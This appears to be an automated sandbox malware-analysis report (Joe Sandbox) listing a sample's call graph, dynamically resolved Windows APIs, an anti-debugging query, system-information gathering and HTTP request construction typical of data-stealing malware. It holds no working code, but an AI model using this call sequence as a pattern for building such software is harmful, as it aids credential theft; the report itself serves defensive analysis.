27158 3a4a60 2 API calls 27157->27158 27159 3a4169 27158->27159 27160 3a4a60 2 API calls 27159->27160 27161 3a417f 27160->27161 27162 3a4a60 2 API calls 27161->27162 27163 3a4198 27162->27163 27164 3a4a60 2 API calls 27163->27164 27165 3a41ae 27164->27165 27166 3a4a60 2 API calls 27165->27166 27167 3a41c4 27166->27167 27168 3a4a60 2 API calls 27167->27168 27169 3a41da 27168->27169 27170 3a4a60 2 API calls 27169->27170 27171 3a41f0 27170->27171 27172 3a4a60 2 API calls 27171->27172 27173 3a4206 27172->27173 27174 3a4a60 2 API calls 27173->27174 27175 3a421f 27174->27175 27176 3a4a60 2 API calls 27175->27176 27177 3a4235 27176->27177 27178 3a4a60 2 API calls 27177->27178 27179 3a424b 27178->27179 27180 3a4a60 2 API calls 27179->27180 27181 3a4261 27180->27181 27182 3a4a60 2 API calls 27181->27182 27183 3a4277 27182->27183 27184 3a4a60 2 API calls 27183->27184 27185 3a428d 27184->27185 27186 3a4a60 2 API calls 27185->27186 27187 3a42a6 27186->27187 27188 3a4a60 2 API calls 27187->27188 27189 3a42bc 27188->27189 27190 3a4a60 2 API calls 27189->27190 27191 3a42d2 27190->27191 27192 3a4a60 2 API calls 27191->27192 27193 3a42e8 27192->27193 27194 3a4a60 2 API calls 27193->27194 27195 3a42fe 27194->27195 27196 3a4a60 2 API calls 27195->27196 27197 3a4314 27196->27197 27198 3a4a60 2 API calls 27197->27198 27199 3a432d 27198->27199 27200 3a4a60 2 API calls 27199->27200 27201 3a4343 27200->27201 27202 3a4a60 2 API calls 27201->27202 27203 3a4359 27202->27203 27204 3a4a60 2 API calls 27203->27204 27205 3a436f 27204->27205 27206 3a4a60 2 API calls 27205->27206 27207 3a4385 27206->27207 27208 3a4a60 2 API calls 27207->27208 27209 3a439b 27208->27209 27210 3a4a60 2 API calls 27209->27210 27211 3a43b4 27210->27211 27212 3a4a60 2 API calls 27211->27212 27213 3a43ca 27212->27213 27214 3a4a60 2 API calls 27213->27214 27215 3a43e0 27214->27215 27216 3a4a60 2 API calls 27215->27216 27217 3a43f6 27216->27217 27218 3a4a60 2 API calls 27217->27218 27219 3a440c 27218->27219 27220 3a4a60 2 API calls 27219->27220 27221 3a4422 27220->27221 27222 3a4a60 2 API calls 27221->27222 27223 3a443b 27222->27223 27224 3a4a60 2 API calls 27223->27224 27225 3a4451 27224->27225 27226 3a4a60 2 API calls 27225->27226 27227 3a4467 27226->27227 27228 3a4a60 2 API calls 27227->27228 27229 3a447d 27228->27229 27230 3a4a60 2 API calls 27229->27230 27231 3a4493 27230->27231 27232 3a4a60 2 API calls 27231->27232 27233 3a44a9 27232->27233 27234 3a4a60 2 API calls 27233->27234 27235 3a44c2 27234->27235 27236 3a4a60 2 API calls 27235->27236 27237 3a44d8 27236->27237 27238 3a4a60 2 API calls 27237->27238 27239 3a44ee 27238->27239 27240 3a4a60 2 API calls 27239->27240 27241 3a4504 27240->27241 27242 3a4a60 2 API calls 27241->27242 27243 3a451a 27242->27243 27244 3a4a60 2 API calls 27243->27244 27245 3a4530 27244->27245 27246 3a4a60 2 API calls 27245->27246 27247 3a4549 27246->27247 27248 3a4a60 2 API calls 27247->27248 27249 3a455f 27248->27249 27250 3a4a60 2 API calls 27249->27250 27251 3a4575 27250->27251 27252 3a4a60 2 API calls 27251->27252 27253 3a458b 27252->27253 27254 3a4a60 2 API calls 27253->27254 27255 3a45a1 27254->27255 27256 3a4a60 2 API calls 27255->27256 27257 3a45b7 27256->27257 27258 3a4a60 2 API calls 27257->27258 27259 3a45d0 27258->27259 27260 3a4a60 2 API calls 27259->27260 27261 3a45e6 27260->27261 27262 3a4a60 2 API calls 27261->27262 27263 3a45fc 27262->27263 27264 3a4a60 2 API calls 27263->27264 27265 3a4612 27264->27265 27266 3a4a60 2 API calls 27265->27266 27267 3a4628 27266->27267 27268 3a4a60 2 API calls 27267->27268 27269 3a463e 27268->27269 27270 3a4a60 2 API calls 27269->27270 27271 3a4657 27270->27271 27272 3a4a60 2 API calls 27271->27272 27273 3a466d 27272->27273 27274 3a4a60 2 API calls 27273->27274 27275 3a4683 27274->27275 27276 3a4a60 2 API calls 27275->27276 27277 3a4699 27276->27277 27278 3a4a60 2 API calls 27277->27278 27279 3a46af 27278->27279 27280 3a4a60 2 API calls 27279->27280 27281 3a46c5 27280->27281 27282 3a4a60 2 API calls 27281->27282 27283 3a46de 27282->27283 27284 3a4a60 2 API calls 27283->27284 27285 3a46f4 27284->27285 27286 3a4a60 2 API calls 27285->27286 27287 3a470a 27286->27287 27288 3a4a60 2 API calls 27287->27288 27289 3a4720 27288->27289 27290 3a4a60 2 API calls 27289->27290 27291 3a4736 27290->27291 27292 3a4a60 2 API calls 27291->27292 27293 3a474c 27292->27293 27294 3a4a60 2 API calls 27293->27294 27295 3a4765 27294->27295 27296 3a4a60 2 API calls 27295->27296 27297 3a477b 27296->27297 27298 3a4a60 2 API calls 27297->27298 27299 3a4791 27298->27299 27300 3a4a60 2 API calls 27299->27300 27301 3a47a7 27300->27301 27302 3a4a60 2 API calls 27301->27302 27303 3a47bd 27302->27303 27304 3a4a60 2 API calls 27303->27304 27305 3a47d3 27304->27305 27306 3a4a60 2 API calls 27305->27306 27307 3a47ec 27306->27307 27308 3a4a60 2 API calls 27307->27308 27309 3a4802 27308->27309 27310 3a4a60 2 API calls 27309->27310 27311 3a4818 27310->27311 27312 3a4a60 2 API calls 27311->27312 27313 3a482e 27312->27313 27314 3a4a60 2 API calls 27313->27314 27315 3a4844 27314->27315 27316 3a4a60 2 API calls 27315->27316 27317 3a485a 27316->27317 27318 3a4a60 2 API calls 27317->27318 27319 3a4873 27318->27319 27320 3a4a60 2 API calls 27319->27320 27321 3a4889 27320->27321 27322 3a4a60 2 API calls 27321->27322 27323 3a489f 27322->27323 27324 3a4a60 2 API calls 27323->27324 27325 3a48b5 27324->27325 27326 3a4a60 2 API calls 27325->27326 27327 3a48cb 27326->27327 27328 3a4a60 2 API calls 27327->27328 27329 3a48e1 27328->27329 27330 3a4a60 2 API calls 27329->27330 27331 3a48fa 27330->27331 27332 3a4a60 2 API calls 27331->27332 27333 3a4910 27332->27333 27334 3a4a60 2 API calls 27333->27334 27335 3a4926 27334->27335 27336 3a4a60 2 API calls 27335->27336 27337 3a493c 27336->27337 27338 3a4a60 2 API calls 27337->27338 27339 3a4952 27338->27339 27340 3a4a60 2 API calls 27339->27340 27341 3a4968 27340->27341 27342 3a4a60 2 API calls 27341->27342 27343 3a4981 27342->27343 27344 3a4a60 2 API calls 27343->27344 27345 3a4997 27344->27345 27346 3a4a60 2 API calls 27345->27346 27347 3a49ad 27346->27347 27348 3a4a60 2 API calls 27347->27348 27349 3a49c3 27348->27349 27350 3a4a60 2 API calls 27349->27350 27351 3a49d9 27350->27351 27352 3a4a60 2 API calls 27351->27352 27353 3a49ef 27352->27353 27354 3a4a60 2 API calls 27353->27354 27355 3a4a08 27354->27355 27356 3a4a60 2 API calls 27355->27356 27357 3a4a1e 27356->27357 27358 3a4a60 2 API calls 27357->27358 27359 3a4a34 27358->27359 27360 3a4a60 2 API calls 27359->27360 27361 3a4a4a 27360->27361 27362 3c66e0 27361->27362 27363 3c66ed 43 API calls 27362->27363 27364 3c6afe 8 API calls 27362->27364 27363->27364 27365 3c6c08 27364->27365 27366 3c6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27364->27366 27367 3c6c15 8 API calls 27365->27367 27368 3c6cd2 27365->27368 27366->27365 27367->27368 27369 3c6d4f 27368->27369 27370 3c6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27368->27370 27371 3c6d5c 6 API calls 27369->27371 27372 3c6de9 27369->27372 27370->27369 27371->27372 27373 3c6df6 12 API calls 27372->27373 27374 3c6f10 27372->27374 27373->27374 27375 3c6f8d 27374->27375 27376 3c6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27374->27376 27377 3c6f96 GetProcAddress GetProcAddress 27375->27377 27378 3c6fc1 27375->27378 27376->27375 27377->27378 27379 3c6fca GetProcAddress GetProcAddress 27378->27379 27380 3c6ff5 27378->27380 27379->27380 27381 3c70ed 27380->27381 27382 3c7002 10 API calls 27380->27382 27383 3c70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27381->27383 27384 3c7152 27381->27384 27382->27381 27383->27384 27385 3c716e 27384->27385 27386 3c715b GetProcAddress 27384->27386 27387 3c7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27385->27387 27388 3c051f 27385->27388 27386->27385 27387->27388 27389 3a1530 27388->27389 27698 3a1610 27389->27698 27391 3a153b 27392 3a1555 lstrcpy 27391->27392 27393 3a155d 27391->27393 27392->27393 27394 3a1577 lstrcpy 27393->27394 27395 3a157f 27393->27395 27394->27395 27396 3a1599 lstrcpy 27395->27396 27397 3a15a1 27395->27397 27396->27397 27398 3a1605 27397->27398 27399 3a15fd lstrcpy 27397->27399 27400 3bf1b0 lstrlen 27398->27400 27399->27398 27401 3bf1e4 27400->27401 27402 3bf1eb lstrcpy 27401->27402 27403 3bf1f7 lstrlen 27401->27403 27402->27403 27404 3bf208 27403->27404 27405 3bf21b lstrlen 27404->27405 27406 3bf20f lstrcpy 27404->27406 27407 3bf22c 27405->27407 27406->27405 27408 3bf233 lstrcpy 27407->27408 27409 3bf23f 27407->27409 27408->27409 27410 3bf258 lstrcpy 27409->27410 27411 3bf264 27409->27411 27410->27411 27412 3bf286 lstrcpy 27411->27412 27413 3bf292 27411->27413 27412->27413 27414 3bf2ba lstrcpy 27413->27414 27415 3bf2c6 27413->27415 27414->27415 27416 3bf2ea lstrcpy 27415->27416 27477 3bf300 27415->27477 27416->27477 27417 3bf30c lstrlen 27417->27477 27418 3bf4b9 lstrcpy 27418->27477 27419 3bf3a1 lstrcpy 27419->27477 27420 3bf3c5 lstrcpy 27420->27477 27421 3bf4e8 lstrcpy 27481 3bf4f0 27421->27481 27422 3bf479 lstrcpy 27422->27477 27423 3bf59c lstrcpy 27423->27481 27424 3bf70f StrCmpCA 27429 3bfe8e 27424->27429 27424->27477 27425 3bf616 StrCmpCA 27425->27424 27425->27481 27426 3bfa29 StrCmpCA 27437 3bfe2b 27426->27437 27426->27477 27427 3bf73e lstrlen 27427->27477 27428 3bfead lstrlen 27440 3bfec7 27428->27440 27429->27428 27435 3bfea5 lstrcpy 27429->27435 27430 3bfd4d StrCmpCA 27431 3bfd60 Sleep 27430->27431 27442 3bfd75 27430->27442 27431->27477 27432 3bfa58 lstrlen 27432->27477 27433 3bf64a lstrcpy 27433->27481 27434 3a1530 8 API calls 27434->27481 27435->27428 27436 3bfe4a lstrlen 27450 3bfe64 27436->27450 27437->27436 27438 3bfe42 lstrcpy 27437->27438 27438->27436 27439 3bf89e lstrcpy 27439->27477 27441 3bfee7 lstrlen 27440->27441 27445 3bfedf lstrcpy 27440->27445 27448 3bff01 27441->27448 27443 3bfd94 lstrlen 27442->27443 27446 3bfd8c lstrcpy 27442->27446 27452 3bfdae 27443->27452 27444 3bf76f lstrcpy 27444->27477 27445->27441 27446->27443 27447 3bfbb8 lstrcpy 27447->27477 27458 3bff21 27448->27458 27460 3bff19 lstrcpy 27448->27460 27449 3bfa89 lstrcpy 27449->27477 27451 3bfdce lstrlen 27450->27451 27453 3bfe7c lstrcpy 27450->27453 27459 3bfde8 27451->27459 27452->27451 27464 3bfdc6 lstrcpy 27452->27464 27453->27451 27454 3bf791 lstrcpy 27454->27477 27456 3a1530 8 API calls 27456->27477 27457 3bf8cd lstrcpy 27457->27481 27461 3a1610 4 API calls 27458->27461 27466 3bfe08 27459->27466 27469 3bfe00 lstrcpy 27459->27469 27460->27458 27484 3bfe13 27461->27484 27462 3bfaab lstrcpy 27462->27477 27463 3bf698 lstrcpy 27463->27481 27464->27451 27465 3bfbe7 lstrcpy 27465->27481 27470 3a1610 4 API calls 27466->27470 27467 3bee90 28 API calls 27467->27477 27468 3befb0 35 API calls 27468->27481 27469->27466 27470->27484 27471 3bf7e2 lstrcpy 27471->27477 27472 3bf924 lstrcpy 27472->27481 27473 3bf99e StrCmpCA 27473->27426 27473->27481 27474 3bfafc lstrcpy 27474->27477 27475 3bfc3e lstrcpy 27475->27481 27476 3bfcb8 StrCmpCA 27476->27430 27476->27481 27477->27417 27477->27418 27477->27419 27477->27420 27477->27421 27477->27422 27477->27424 27477->27426 27477->27427 27477->27430 27477->27432 27477->27439 27477->27444 27477->27447 27477->27449 27477->27454 27477->27456 27477->27457 27477->27462 27477->27465 27477->27467 27477->27471 27477->27474 27477->27481 27478 3bf9cb lstrcpy 27478->27481 27479 3bfce9 lstrcpy 27479->27481 27480 3bee90 28 API calls 27480->27481 27481->27423 27481->27425 27481->27426 27481->27430 27481->27433 27481->27434 27481->27463 27481->27468 27481->27472 27481->27473 27481->27475 27481->27476 27481->27477 27481->27478 27481->27479 27481->27480 27482 3bfa19 lstrcpy 27481->27482 27483 3bfd3a lstrcpy 27481->27483 27482->27481 27483->27481 27484->26508 27486 3c278c GetVolumeInformationA 27485->27486 27487 3c2785 27485->27487 27488 3c27ec GetProcessHeap RtlAllocateHeap 27486->27488 27487->27486 27490 3c2826 wsprintfA 27488->27490 27491 3c2822 27488->27491 27490->27491 27708 3c71e0 27491->27708 27495 3a4c70 27494->27495 27496 3a4c85 27495->27496 27497 3a4c7d lstrcpy 27495->27497 27712 3a4bc0 27496->27712 27497->27496 27499 3a4c90 27500 3a4ccc lstrcpy 27499->27500 27501 3a4cd8 27499->27501 27500->27501 27502 3a4cff lstrcpy 27501->27502 27503 3a4d0b 27501->27503 27502->27503 27504 3a4d2f lstrcpy 27503->27504 27505 3a4d3b 27503->27505 27504->27505 27506 3a4d6d lstrcpy 27505->27506 27507 3a4d79 27505->27507 27506->27507 27508 3a4dac InternetOpenA StrCmpCA 27507->27508 27509 3a4da0 lstrcpy 27507->27509 27510 3a4de0 27508->27510 27509->27508 27511 3a54b8 InternetCloseHandle CryptStringToBinaryA 27510->27511 27716 3c3e70 27510->27716 27512 3a54e8 LocalAlloc 27511->27512 27529 3a55d8 27511->27529 27514 3a54ff CryptStringToBinaryA 27512->27514 27512->27529 27515 3a5529 lstrlen 27514->27515 27516 3a5517 LocalFree 27514->27516 27517 3a553d 27515->27517 27516->27529 27519 3a5563 lstrlen 27517->27519 27520 3a5557 lstrcpy 27517->27520 27518 3a4dfa 27521 3a4e23 lstrcpy lstrcat 27518->27521 27522 3a4e38 27518->27522 27524 3a557d 27519->27524 27520->27519 27521->27522 27523 3a4e5a lstrcpy 27522->27523 27526 3a4e62 27522->27526 27523->27526 27525 3a558f lstrcpy lstrcat 27524->27525 27527 3a55a2 27524->27527 27525->27527 27528 3a4e71 lstrlen 27526->27528 27531 3a55d1 27527->27531 27532 3a55c9 lstrcpy 27527->27532 27530 3a4e89 27528->27530 27529->26537 27533 3a4e95 lstrcpy lstrcat 27530->27533 27534 3a4eac 27530->27534 27531->27529 27532->27531 27533->27534 27535 3a4ed5 27534->27535 27536 3a4ecd lstrcpy 27534->27536 27537 3a4edc lstrlen 27535->27537 27536->27535 27538 3a4ef2 27537->27538 27539 3a4efe lstrcpy lstrcat 27538->27539 27540 3a4f15 27538->27540 27539->27540 27541 3a4f36 lstrcpy 27540->27541 27542 3a4f3e 27540->27542 27541->27542 27543 3a4f65 lstrcpy lstrcat 27542->27543 27544 3a4f7b 27542->27544 27543->27544 27545 3a4fa4 27544->27545 27546 3a4f9c lstrcpy 27544->27546 27547 3a4fab lstrlen 27545->27547 27546->27545 27548 3a4fc1 27547->27548 27549 3a4fcd lstrcpy lstrcat 27548->27549 27550 3a4fe4 27548->27550 27549->27550 27551 3a500d 27550->27551 27552 3a5005 lstrcpy 27550->27552 27553 3a5014 lstrlen 27551->27553 27552->27551 27554 3a502a 27553->27554 27555 3a5036 lstrcpy lstrcat 27554->27555 27556 3a504d 27554->27556 27555->27556 27557 3a5079 27556->27557 27558 3a5071 lstrcpy 27556->27558 27559 3a5080 lstrlen 27557->27559 27558->27557 27560 3a509b 27559->27560 27561 3a50ac lstrcpy lstrcat 27560->27561 27562 3a50bc 27560->27562 27561->27562 27563 3a50da lstrcpy lstrcat 27562->27563 27564 3a50ed 27562->27564 27563->27564 27565 3a510b lstrcpy 27564->27565 27566 3a5113 27564->27566 27565->27566 27567 3a5121 InternetConnectA 27566->27567 27567->27511 27568 3a5150 HttpOpenRequestA 27567->27568 27569 3a518b 27568->27569 27570 3a54b1 InternetCloseHandle 27568->27570 27723 3c7310 lstrlen 27569->27723 27570->27511 27574 3a51a4 27731 3c72c0 27574->27731 27577 3c7280 lstrcpy 27578 3a51c0 27577->27578 27579 3c7310 3 API calls 27578->27579 27580 3a51d5 27579->27580 27581 3c7280 lstrcpy 27580->27581 27582 3a51de 27581->27582 27583 3c7310 3 API calls 27582->27583 27584 3a51f4 27583->27584 27585 3c7280 lstrcpy 27584->27585 27586 3a51fd 27585->27586 27587 3c7310 3 API calls 27586->27587 27588 3a5213 27587->27588 27589 3c7280 lstrcpy 27588->27589 27590 3a521c 27589->27590 27591 3c7310 3 API calls 27590->27591 27592 3a5231 27591->27592 27593 3c7280 lstrcpy 27592->27593 27594 3a523a 27593->27594 27595 3c72c0 2 API calls 27594->27595 27596 3a524d 27595->27596 27597 3c7280 lstrcpy 27596->27597 27598 3a5256 27597->27598 27599 3c7310 3 API calls 27598->27599 27600 3a526b 27599->27600 27601 3c7280 lstrcpy 27600->27601 27602 3a5274 27601->27602 27603 3c7310 3 API calls 27602->27603 27604 3a5289 27603->27604 27605 3c7280 lstrcpy 27604->27605 27606 3a5292 27605->27606 27607 3c72c0 2 API calls 27606->27607 27608 3a52a5 27607->27608 27609 3c7280 lstrcpy 27608->27609 27610 3a52ae 27609->27610 27611 3c7310 3 API calls 27610->27611 27612 3a52c3 27611->27612 27613 3c7280 lstrcpy 27612->27613 27614 3a52cc 27613->27614 27615 3c7310 3 API calls 27614->27615 27616 3a52e2 27615->27616 27617 3c7280 lstrcpy 27616->27617 27618 3a52eb 27617->27618 27619 3c7310 3 API calls 27618->27619 27620 3a5301 27619->27620 27621 3c7280 lstrcpy 27620->27621 27622 3a530a 27621->27622 27623 3c7310 3 API calls 27622->27623 27624 3a531f 27623->27624 27625 3c7280 lstrcpy 27624->27625 27626 3a5328 27625->27626 27627 3c72c0 2 API calls 27626->27627 27628 3a533b 27627->27628 27629 3c7280 lstrcpy 27628->27629 27630 3a5344 27629->27630 27631 3a537c 27630->27631 27632 3a5370 lstrcpy 27630->27632 27633 3c72c0 2 API calls 27631->27633 27632->27631 27634 3a538a 27633->27634 27635 3c72c0 2 API calls 27634->27635 27636 3a5397 27635->27636 27637 3c7280 lstrcpy 27636->27637 27638 3a53a1 27637->27638 27639 3a53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27638->27639 27640 3a549c InternetCloseHandle 27639->27640 27644 3a53f2 27639->27644 27642 3a54ae 27640->27642 27641 3a53fd lstrlen 27641->27644 27642->27570 27643 3a542e lstrcpy lstrcat 27643->27644 27644->27640 27644->27641 27644->27643 27645 3a5473 27644->27645 27646 3a546b lstrcpy 27644->27646 27647 3a547a InternetReadFile 27645->27647 27646->27645 27647->27640 27647->27644 27649 3b8ccd 27648->27649 27650 3b8cc6 ExitProcess 27648->27650 27651 3b8ee2 27649->27651 27652 3b8d5a lstrlen 27649->27652 27653 3b8dbd StrCmpCA 27649->27653 27654 3b8ddd StrCmpCA 27649->27654 27655 3b8dfd StrCmpCA 27649->27655 27656 3b8e1d StrCmpCA 27649->27656 27657 3b8e3d StrCmpCA 27649->27657 27658 3b8d30 lstrlen 27649->27658 27659 3b8e56 StrCmpCA 27649->27659 27660 3b8e88 lstrlen 27649->27660 27661 3b8e6f StrCmpCA 27649->27661 27662 3b8d06 lstrlen 27649->27662 27663 3b8d84 StrCmpCA 27649->27663 27664 3b8da4 StrCmpCA 27649->27664 27665 3b8ebb lstrcpy 27649->27665 27651->26539 27652->27649 27653->27649 27654->27649 27655->27649 27656->27649 27657->27649 27658->27649 27659->27649 27660->27649 27661->27649 27662->27649 27663->27649 27664->27649 27665->27649 27666->26545 27667->26547 27668->26553 27669->26555 27670->26561 27671->26563 27672->26569 27673->26573 27674->26579 27675->26581 27676->26585 27677->26599 27678->26603 27679->26602 27680->26598 27681->26602 27682->26618 27683->26604 27684->26608 27685->26609 27686->26615 27687->26620 27688->26622 27689->26629 27690->26635 27691->26657 27692->26660 27693->26659 27694->26655 27695->26659 27696->26669 27699 3a161f 27698->27699 27700 3a162b lstrcpy 27699->27700 27701 3a1633 27699->27701 27700->27701 27702 3a164d lstrcpy 27701->27702 27703 3a1655 27701->27703 27702->27703 27704 3a166f lstrcpy 27703->27704 27705 3a1677 27703->27705 27704->27705 27706 3a1699 27705->27706 27707 3a1691 lstrcpy 27705->27707 27706->27391 27707->27706 27709 3c71e6 27708->27709 27710 3c71fc lstrcpy 27709->27710 27711 3c2860 27709->27711 27710->27711 27711->26534 27713 3a4bd0 27712->27713 27713->27713 27714 3a4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27713->27714 27715 3a4c41 27714->27715 27715->27499 27717 3c3e83 27716->27717 27718 3c3e9f lstrcpy 27717->27718 27719 3c3eab 27717->27719 27718->27719 27720 3c3ecd lstrcpy 27719->27720 27721 3c3ed5 GetSystemTime 27719->27721 27720->27721 27722 3c3ef3 27721->27722 27722->27518 27725 3c732d 27723->27725 27724 3a519b 27727 3c7280 27724->27727 27725->27724 27726 3c733d lstrcpy lstrcat 27725->27726 27726->27724 27728 3c728c 27727->27728 27729 3c72b4 27728->27729 27730 3c72ac lstrcpy 27728->27730 27729->27574 27730->27729 27733 3c72dc 27731->27733 27732 3a51b7 27732->27577 27733->27732 27734 3c72ed lstrcpy lstrcat 27733->27734 27734->27732 27739 3b4c77 295 API calls 27760 3c31f0 GetSystemInfo wsprintfA 27764 3b1269 408 API calls 27741 3a5869 57 API calls 27756 3c2d60 11 API calls 27777 3c2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27778 3ca280 __CxxFrameHandler 27757 3b3959 244 API calls 27761 3b01d9 126 API calls 27752 3c2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27742 3c2853 lstrcpy 27786 3b8615 48 API calls 27743 3be049 147 API calls 27753 3c3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27779 3b8615 49 API calls 27787 3c33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A4C7F
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4CD2
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4D05
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4D35
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4D73
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003A4DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 348d8c1493168e1c4f51e72769467092ad1018e7c354a34eab37ed26d78a3253
                          • Instruction ID: 16695877e6bb6f95b6b2f931776fd45c03b094806ee6f19b5bc59804ebce75ad
                          • Opcode Fuzzy Hash: 348d8c1493168e1c4f51e72769467092ad1018e7c354a34eab37ed26d78a3253
                          • Instruction Fuzzy Hash: 25526E329112169BCB22EFA4DC49BAFB7B9EF45300F15442AF805EB251DB74ED46CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2125 3c6390-3c63bd GetPEB 2126 3c65c3-3c6623 LoadLibraryA * 5 2125->2126 2127 3c63c3-3c65be call 3c62f0 GetProcAddress * 20 2125->2127 2128 3c6638-3c663f 2126->2128 2129 3c6625-3c6633 GetProcAddress 2126->2129 2127->2126 2131 3c666c-3c6673 2128->2131 2132 3c6641-3c6667 GetProcAddress * 2 2128->2132 2129->2128 2134 3c6688-3c668f 2131->2134 2135 3c6675-3c6683 GetProcAddress 2131->2135 2132->2131 2137 3c66a4-3c66ab 2134->2137 2138 3c6691-3c669f GetProcAddress 2134->2138 2135->2134 2139 3c66ad-3c66d2 GetProcAddress * 2 2137->2139 2140 3c66d7-3c66da 2137->2140 2138->2137 2139->2140
                          APIs
                          • GetProcAddress.KERNEL32(77190000,00F21508), ref: 003C63E9
                          • GetProcAddress.KERNEL32(77190000,00F21628), ref: 003C6402
                          • GetProcAddress.KERNEL32(77190000,00F21580), ref: 003C641A
                          • GetProcAddress.KERNEL32(77190000,00F215C8), ref: 003C6432
                          • GetProcAddress.KERNEL32(77190000,00F293D8), ref: 003C644B
                          • GetProcAddress.KERNEL32(77190000,00F166D8), ref: 003C6463
                          • GetProcAddress.KERNEL32(77190000,00F16858), ref: 003C647B
                          • GetProcAddress.KERNEL32(77190000,00F216B8), ref: 003C6494
                          • GetProcAddress.KERNEL32(77190000,00F216D0), ref: 003C64AC
                          • GetProcAddress.KERNEL32(77190000,00F216E8), ref: 003C64C4
                          • GetProcAddress.KERNEL32(77190000,00F21700), ref: 003C64DD
                          • GetProcAddress.KERNEL32(77190000,00F16698), ref: 003C64F5
                          • GetProcAddress.KERNEL32(77190000,00F215E0), ref: 003C650D
                          • GetProcAddress.KERNEL32(77190000,00F215F8), ref: 003C6526
                          • GetProcAddress.KERNEL32(77190000,00F16638), ref: 003C653E
                          • GetProcAddress.KERNEL32(77190000,00F21610), ref: 003C6556
                          • GetProcAddress.KERNEL32(77190000,00F21640), ref: 003C656F
                          • GetProcAddress.KERNEL32(77190000,00F16658), ref: 003C6587
                          • GetProcAddress.KERNEL32(77190000,00F21808), ref: 003C659F
                          • GetProcAddress.KERNEL32(77190000,00F16678), ref: 003C65B8
                          • LoadLibraryA.KERNEL32(00F217F0,?,?,?,003C1C03), ref: 003C65C9
                          • LoadLibraryA.KERNEL32(00F21850,?,?,?,003C1C03), ref: 003C65DB
                          • LoadLibraryA.KERNEL32(00F218B0,?,?,?,003C1C03), ref: 003C65ED
                          • LoadLibraryA.KERNEL32(00F21820,?,?,?,003C1C03), ref: 003C65FE
                          • LoadLibraryA.KERNEL32(00F21838,?,?,?,003C1C03), ref: 003C6610
                          • GetProcAddress.KERNEL32(76850000,00F21898), ref: 003C662D
                          • GetProcAddress.KERNEL32(77040000,00F21868), ref: 003C6649
                          • GetProcAddress.KERNEL32(77040000,00F21880), ref: 003C6661
                          • GetProcAddress.KERNEL32(75A10000,00F29550), ref: 003C667D
                          • GetProcAddress.KERNEL32(75690000,00F166F8), ref: 003C6699
                          • GetProcAddress.KERNEL32(776F0000,00F29468), ref: 003C66B5
                          • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 003C66CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 003C66C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
